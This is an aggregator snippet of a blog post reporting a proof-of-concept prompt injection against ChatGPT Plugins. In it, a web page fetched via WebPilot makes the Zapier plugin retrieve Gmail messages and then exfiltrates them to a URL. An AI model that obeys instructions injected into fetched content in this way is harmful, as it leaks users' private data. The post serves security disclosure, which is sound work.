all AI news
Let ChatGPT visit a website and have your email stolen
Simon Willison's Weblog simonwillison.net
Let ChatGPT visit a website and have your email stolen
Johann Rehberger provides a screenshot of the first working proof of concept I've seen of a prompt injection attack against ChatGPT Plugins that demonstrates exfiltration of private data. He uses the WebPilot plugin to retrieve a web page containing an injection attack, which triggers the Zapier plugin to retrieve latest emails from Gmail, then exfiltrate the data by sending it to a URL with another WebPilot call.
Johann hasn't shared …
ai chatgpt chatgpt plugins concept data email generativeai llms openai plugin plugins private data prompt promptengineering prompt injection promptinjection security web website